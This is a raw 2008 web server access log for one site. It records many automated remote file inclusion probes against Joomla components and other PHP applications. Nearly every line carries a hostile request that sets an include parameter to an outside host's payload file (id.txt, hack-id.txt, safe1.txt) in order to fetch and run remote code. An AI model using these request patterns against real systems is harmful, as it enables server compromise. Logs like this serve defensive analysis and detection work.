77.79.245.90 - - [22/Sep/2008:09:38:58 -0700] "GET /logs/access_080227.log//ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:58 -0700] "GET /logs//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:38:58 -0700] "GET //ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:59 -0700] "GET //includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:38:59 -0700] "GET /logs//ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:39:03 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:23 -0700] "GET /logs/access_080910.log/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:23 -0700] "GET /index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:23 -0700] "GET /logs/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:24 -0700] "GET /logs/access_080907.log/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:41 -0700] "GET /logs/access_080507.log/index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:39:42 -0700] "GET /logs/access_080523.log/index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:46 -0700] "GET /logs/access_080902.log/head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:46 -0700] "GET /logs/access_080902.log/head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:46 -0700] "GET /head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:46 -0700] "GET /head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:47 -0700] "GET /logs/head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:39:47 -0700] "GET /logs/head.php?adresa=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:39:49 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.14.73 - - [22/Sep/2008:09:39:52 -0700] "GET /logs/access_080401.log//administrator/index.php?option=com_content&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.73 - - [22/Sep/2008:09:39:53 -0700] "GET //administrator/index.php?option=com_content&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.73 - - [22/Sep/2008:09:39:53 -0700] "GET /logs//administrator/index.php?option=com_content&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:40:33 -0700] "GET /logs/access_080910.log%20/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:40:54 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:40:57 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:40:57 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:40:58 -0700] "GET /logs/access_080830.log//include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:40:59 -0700] "GET /logs/access_080905.log//include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:41:08 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:41:10 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:41:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:41:10 -0700] "GET /logs/access_080303.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:41:11 -0700] "GET /logs/access_080830.log//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:41:13 -0700] "GET /logs/access_080903.log//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:09:41:15 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:09:41:16 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:18 -0700] "GET /logs/access_080815.log//poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:41:18 -0700] "GET //administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:18 -0700] "GET //poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:18 -0700] "GET /logs/access_080815.log//poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:18 -0700] "GET /logs//poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:19 -0700] "GET //poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:41:19 -0700] "GET /logs//poll/png.php?include_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.218.59 - - [22/Sep/2008:09:41:20 -0700] "GET /logs/access_080304.log//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:41:21 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.218.59 - - [22/Sep/2008:09:41:21 -0700] "GET //sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.218.59 - - [22/Sep/2008:09:41:22 -0700] "GET /logs//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:41:45 -0700] "GET //ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:41:47 -0700] "GET /logs//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.33 - - [22/Sep/2008:09:41:47 -0700] "GET /logs/access_080905.log//?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:41:48 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.33 - - [22/Sep/2008:09:41:53 -0700] "GET //?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 200 94750 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.33 - - [22/Sep/2008:09:41:54 -0700] "GET /logs//?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 200 66168 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:41:59 -0700] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:00 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:00 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:00 -0700] "GET /logs/access_080514.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:42:07 -0700] "GET /logs/access_080617.log/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:42:07 -0700] "GET /logs/access_080413.log/index2.php?showpage=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:42:09 -0700] "GET /logs/access_080606.log//ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:09:42:17 -0700] "GET /logs/access_080812.log//administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:09:42:17 -0700] "GET //administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:09:42:17 -0700] "GET /logs//administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:19 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:19 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:42:20 -0700] "GET /logs//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:42:20 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:25 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:26 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:27 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:27 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:39 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:40 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:40 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:41 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.1.215.164 - - [22/Sep/2008:09:42:43 -0700] "GET /logs/access_080806.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:45 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:46 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:47 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:42:48 -0700] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:55 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.121.14.73 - - [22/Sep/2008:09:42:57 -0700] "GET /logs//administrator/index.php?option=com_cropimage&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.73 - - [22/Sep/2008:09:42:58 -0700] "GET //administrator/index.php?option=com_cropimage&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:42:58 -0700] "GET /logs/access_080322.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:43:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:43:06 -0700] "GET /logs/access_080524.log//ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:43:07 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:43:09 -0700] "GET /logs/access_080322.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:43:18 -0700] "GET /logs/access_080322.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:43:28 -0700] "GET /logs/access_080820.log/index.php?menu=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.74.198.93 - - [22/Sep/2008:09:43:28 -0700] "GET /logs//atom.php5?page=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:43:29 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:43:32 -0700] "GET /logs/access_080830.log///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.198.93 - - [22/Sep/2008:09:43:33 -0700] "GET //atom.php5?page=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:43:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:43:42 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:43:44 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [22/Sep/2008:09:43:50 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.listitsellit.us//adpics/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.146.15.54 - - [22/Sep/2008:09:43:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.listitsellit.us//adpics/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.146.15.54 - - [22/Sep/2008:09:43:50 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.listitsellit.us//adpics/id.txt??? HTTP/1.1" 200 95360 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:43:53 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:44:07 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:09:44:11 -0700] "GET /logs/access_080425.log//administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:44:16 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:44:16 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
